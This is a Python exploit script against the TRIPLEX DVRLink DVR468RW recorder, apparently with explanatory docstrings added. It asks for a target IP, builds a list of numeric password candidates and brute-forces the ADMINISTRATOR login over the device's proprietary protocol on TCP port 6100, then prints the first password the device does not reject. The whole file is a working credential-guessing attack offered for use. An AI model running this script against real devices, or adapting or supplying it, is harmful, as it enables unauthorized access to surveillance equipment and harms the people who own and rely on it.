TRIPLEX DVRLink DVR468RW Exploit
#!/usr/bin/env python | |
import socket | |
import binascii | |
import sys | |
import time | |
def passList():
    """Build the ordered list of login candidates the main loop walks.

    Each integer counter is rendered by str_base() in base 5; str_base()
    returns 0 for any rendering that contains a '0', so the survivors are
    strings over the digits 1-4.  The loop condition looks at the last
    accepted candidate, not the counter, and is re-checked only after an
    append, so it stops once that candidate exceeds 44444444 -- i.e. after
    every 1-4 string of up to eight digits plus the first accepted
    nine-digit one.  The list is seeded with the int 1 before str_base(1)
    == '1' is added, so the first candidate appears twice (once as an int,
    once as a str).
    """
    candidates = [1]
    counter = 0
    while True:
        # Bound is on the most recently accepted rendering.
        if int(candidates[-1]) > 44444444:
            break
        counter += 1
        rendered = str_base(int(counter))
        # str_base() signals "contains a 0" with the int 0, not a string.
        if rendered != 0:
            candidates.append(rendered)
    return candidates
def asctohex(string_in):
    """Return *string_in* as a lowercase hex string, two digits per character.

    Each character contributes exactly two hex digits: ord() is formatted to
    at least two digits and only the last two are kept, so code points above
    0xff are silently truncated to their low byte rather than rejected.
    """
    return "".join(format(ord(ch), "02x")[-2:] for ch in string_in)
def getIP():
    """Prompt until the operator types something socket.inet_aton() accepts.

    inet_aton() is the only validation applied; whatever it parses is
    returned unchanged as the text typed.  The bytes comparisons in the main
    loop (b'02000008' and friends) show this script targets Python 3, where
    input() returns the raw text; under Python 2 input() would evaluate it.
    """
    while True:
        typed = input("Enter IP: ")
        try:
            socket.inet_aton(typed)
        except socket.error:
            print("Error, Try Again")
            continue
        return typed
def connect(to, port):
    """Open an IPv4 TCP connection to (to, port) and return the socket.

    No timeout is set here -- the caller applies settimeout() afterwards --
    and the socket is never closed by this function; the caller owns it.
    Raises whatever socket.connect() raises on failure.
    """
    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    sock.connect((to, port))
    return sock
def makePassPacket(password):
    """Assemble the login record for *password* as a hex string.

    Read from the literals: a 14-byte field that decodes to "ADMINISTRATOR"
    plus a NUL, an 18-byte fixed field the original author did not identify,
    the password rendered by asctohex(), a 0x00 terminator, and then as many
    leading characters of a fixed filler string as are needed to reach 128
    hex characters (64 bytes).  `need` is that remaining count; for the short
    numeric candidates passList() yields it stays positive and within the
    filler, but a password long enough to drive `need` negative makes
    filler[:need] a long prefix rather than nothing, so the record would then
    overshoot 64 bytes.
    """
    hex_parts = [
        '41444d494e4953545241544f5200',          # 14 bytes: "ADMINISTRATOR" + NUL
        '0000eb030000920303000000000058d86701',  # 18 bytes, fixed, not identified
        asctohex(password),                      # candidate as ASCII hex
        '00',                                    # terminator
    ]
    packet = "".join(hex_parts)
    need = 128 - len(packet)  # hex chars still missing from 64 bytes
    filler = '010000eb03000092030300000000003c21f6064c9c6a0700000000000000000000'
    return packet + filler[:need]
def str_base(num, base=5, numerals = '01234'):
    """Render *num* in *base* using *numerals*, or return 0 if it contains '0'.

    Digits are taken from *numerals* by position (numerals[d] for digit d).
    The rejection test is on the literal character '0' in the rendering, not
    on numerals[0], and num == 0 renders as '' (which is not rejected).
    Raises ValueError when base is below 2 or exceeds len(numerals).
    Non-positive inputs other than 0 are not handled (the loop would not
    terminate), exactly as in the original.
    """
    if not 2 <= base <= len(numerals):
        raise ValueError("str_base: base must be between 2 and %i" % len(numerals))
    digits = []
    remaining = num
    while remaining:
        remaining, digit = divmod(remaining, base)
        digits.append(numerals[digit])
    rendered = "".join(reversed(digits))
    if '0' in rendered:
        return 0
    return rendered
# --- main: walks the candidate list against one login endpoint ---
# NOTE(review): everything below runs at import time; there is no
# `if __name__ == "__main__":` guard.
TCP_IP = getIP()
TCP_PORT = 6100
print('Generating password list..')
passwords = passList()
print('Running...')
# Fixed 4-byte request headers; their meaning is not documented here.
msg1=binascii.unhexlify('01010000')
msg2=binascii.unhexlify('01010004')
msg4=binascii.unhexlify('01200040')
# One candidate per iteration, each on two fresh TCP connections that are
# never explicitly closed.  Seen from the device or the network this is a
# steady run of short-lived connections to port 6100 spaced by the 0.1 s
# sleep at the bottom -- the pattern a per-source connection-rate limit or a
# lockout after a few failed logins on the device's login port would stop.
for password in passwords:
    s1 = connect(TCP_IP,TCP_PORT)
    #socket 1 data 1
    s1.send(msg1)
    s1.settimeout(5)  # set after send(); only the recv() calls below time out
    # recv(4) may return fewer than 4 bytes; a short read simply fails the
    # comparison below.  A timeout raises socket.timeout uncaught, ending
    # the run.
    data1 = s1.recv(4)
    data2 = s1.recv(4)
    if (binascii.b2a_hex(data1) != b'02000008'):
        sys.exit("First packet incorect")
    s2 = connect(TCP_IP,TCP_PORT)
    #socket 2 data 1
    s2.send(msg2)
    # Echo the second reply from socket 1 back on socket 2: hex -> first 8
    # hex chars -> bytes is just data2's first four bytes (all of data2 when
    # the read was full).
    msg3=binascii.unhexlify(binascii.b2a_hex(data2)[0:8])
    s2.send(msg3)
    s2.settimeout(5)
    data3 = s2.recv(4)
    data4 = s2.recv(8)  # read but never used
    if (binascii.b2a_hex(data3) != b'02000004'):
        sys.exit("Second packet incorect")
    #socket 1 data 2
    # str(): the first candidate from passList() is the int 1, the rest are str.
    passPacket = makePassPacket(str(password))
    s1.send(msg4)
    s1.send(binascii.unhexlify(passPacket))
    data5 = s1.recv(8)  # read but never used
    data6 = s1.recv(8)
    # Anything other than the 02160000 reply is taken as success, so a short
    # read or any unexpected status also prints "Password:" and stops --
    # nothing here distinguishes "accepted" from "unexpected".
    if (binascii.b2a_hex(data6) != b'02160000' ):
        print('Password:',password)
        sys.exit()
    time.sleep(0.1)